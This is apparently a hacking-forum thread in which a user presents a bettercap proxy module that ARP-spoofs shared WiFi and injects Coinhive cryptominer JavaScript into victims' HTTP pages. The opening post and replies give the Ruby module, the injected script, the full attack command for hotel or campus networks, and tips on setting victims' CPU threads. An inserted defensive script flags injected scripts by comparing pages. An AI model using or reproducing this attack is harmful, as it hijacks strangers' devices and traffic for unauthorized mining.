Injecting Coinhive JS with Bettercap

ruby
mitm
coinhive
mining

(hihe bark) #1

Hi,
This is my first post. I’m not sure if it is allowed to write about this here, but the worst thing that will happen is the removal of this post.
I have been working with bettercap for a while. “Bettercap is a Better(ettercap, for making a MITM attack) version written in Ruby by @evilsocket”, with a lot of integrated options and more flexibility. I have read all the proxy modules and it has been fun, but I didn’t have any idea for writing my own. Then this tweet came to me, and that’s it, I had my idea.
The concept was to inject a JS coin miner into an HTTP response. With the help of the coinhive site I have the JS coin miner and my public KEY, and then a simple script in Ruby (I am not a wizard in Ruby but I get the basics). I needed the user to pass the key argument --coin-key KEY; it was like this:

@@coinkey = nil
def self.on_options(opts)
  opts.on( '--coin-key KEY', 'Your site key on coinhive.' ) do |v|
    @@coinkey = v
  end
end

And if --coin-key is not set, raise an error. So now that we have the key, we need to integrate it into the JS:

@loadcoinhive = "<script src='https://coinhive.com/lib/coinhive.min.js'></script> //coinhive js library "
@jscontent = "<script> var miner = new CoinHive.Anonymous('#{@@coinkey}'); miner.start(); </script>"
@jsfile = "#{@loadcoinhive}#{@jscontent}"

All we’ve got to do is, on every request of the type html, inject that jsfile that we created --^. Now we need to inject it where it will be executed, and yes, after </title>, so it will be like this:

response.body.sub!( '</title>', "</title>#{@jsfile}" )

And that’s it. Now you can connect to your free WiFi (hotel, campus, …) and run this command in your terminal: ~># bettercap -X -S ARP --proxy --proxy-module Scripts/makemoney.rb --coin-key "YOUR_KEY_HERE". My module is under my Scripts folder, so change it to yours.
Hope you like the post, and don’t forget to install HTTPS Everywhere on your browser when you’re using public WiFi. Peace

You can clone the script here >> makemoney.rb
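
From the defender's side, the injection described in this post shows up as script elements that the origin server never sent. The following is an added example, not part of the original posts or of bettercap: it compares a known-good copy of a page (fetched over a trusted path) with the copy received on the untrusted network and reports the extra scripts. The function names, the host allowlist and the sample pages are assumptions constructed for illustration.

```ruby
require 'uri'

# Each <script> element: capture 1 = attribute string, capture 2 = inline body.
SCRIPT_RE = %r{<script\b([^>]*)>(.*?)</script>}im
# Markers taken from the snippet quoted in this thread.
MINER_MARKERS = [/coinhive\.min\.js/i, /CoinHive\.Anonymous/].freeze

# Normalised list of the scripts a page carries.
def scripts(html)
  html.scan(SCRIPT_RE).map do |attrs, body|
    src = attrs[/\bsrc\s*=\s*['"]?([^'"\s>]+)/i, 1]
    host = begin
      src && URI.parse(src).host
    rescue URI::InvalidURIError
      nil
    end
    { src: src, host: host, inline: body.strip }
  end
end

# Scripts in the copy received over the untrusted network that the
# known-good copy does not contain, each with the reasons it was flagged.
def injected_scripts(baseline_html, received_html, allowed_hosts)
  known = scripts(baseline_html)
  (scripts(received_html) - known).map do |s|
    text = "#{s[:src]} #{s[:inline]}"
    reasons = [:not_in_baseline]
    reasons << :unlisted_host if s[:host] && !allowed_hosts.include?(s[:host])
    reasons << :miner_marker if MINER_MARKERS.any? { |re| text.match?(re) }
    s.merge(reasons: reasons)
  end
end

# Constructed sample pages (not captured traffic); the key is a placeholder.
BASELINE = <<~HTML
  <html><head><title>Portal</title>
  <script src="https://cdn.example.org/app.js"></script></head>
  <body><p>Welcome</p></body></html>
HTML
TAMPERED = BASELINE.sub('</title>',
  "</title><script src='https://coinhive.com/lib/coinhive.min.js'></script>" \
  "<script> var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER'); miner.start(); </script>")

if __FILE__ == $PROGRAM_NAME
  injected_scripts(BASELINE, TAMPERED, ['cdn.example.org']).each do |s|
    puts "#{s[:reasons].join(',')}: #{s[:src] || s[:inline][0, 40]}"
  end
end
```

The comparison only works for pages served over plain HTTP, which is the only traffic the proxy module in this post can rewrite; a page delivered over HTTPS with a valid certificate reaches the browser unmodified.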


(oaktree) #2

Hi there @hihebark,

Would you please explain what exactly you did and how it works?


(hihe bark) #3

Hello @oaktree
If you’re talking about the code, the code is simple; I tried to make it as easy as possible.
Bettercap will search for a response with html type and then replace the </title> with </title><script src='https://coinhive.com/lib/coinhive.min.js'></script><script> var miner = new CoinHive.Anonymous('KEY'); miner.start(); </script>. The KEY is passed after --coin-key KEY.
As for the JS, it is provided by coinhive.com (see the documentation).
Then you can connect to your campus WiFi or hotel and run the command above # bettercap -X -S ARP --proxy --proxy-module Scripts/makemoney.rb --coin-key "YOUR_KEY_HERE" and profit.
I hope that I provided a full explanation. Sorry for my English.


(oaktree) #4

What I meant was, you should post a complete tutorial on your tool. It’d be cool if you explained the concepts and so on. The Code of Conduct prohibits simple link dropping without explanation…


(hihe bark) #5

OK Mr @oaktree, now I get you. I will re-edit my post.


#6

Great work, man! Is there any possibility to control the CPU usage on the injected machine? Now it takes all the CPU it can get.


(hihe bark) #7

You are welcome :) @Ph4ant0m
Yes, sure you can. In the JS you can set the number of threads that will be in use, like this:

<script>
var miner = new CoinHive.Anonymous(
    '#{@@coinkey}',
    {
        threads: 4,
        autoThreads: false
    }
);
miner.start();
</script>

Or just by setting them before miner.start(); like this: miner.setNumThreads(2); miner.setAutoThreadsEnabled(false); and you’re done.

For more options go to >> coinhive documentation


#8

thanks again…rtfm :smile: and there it was :).

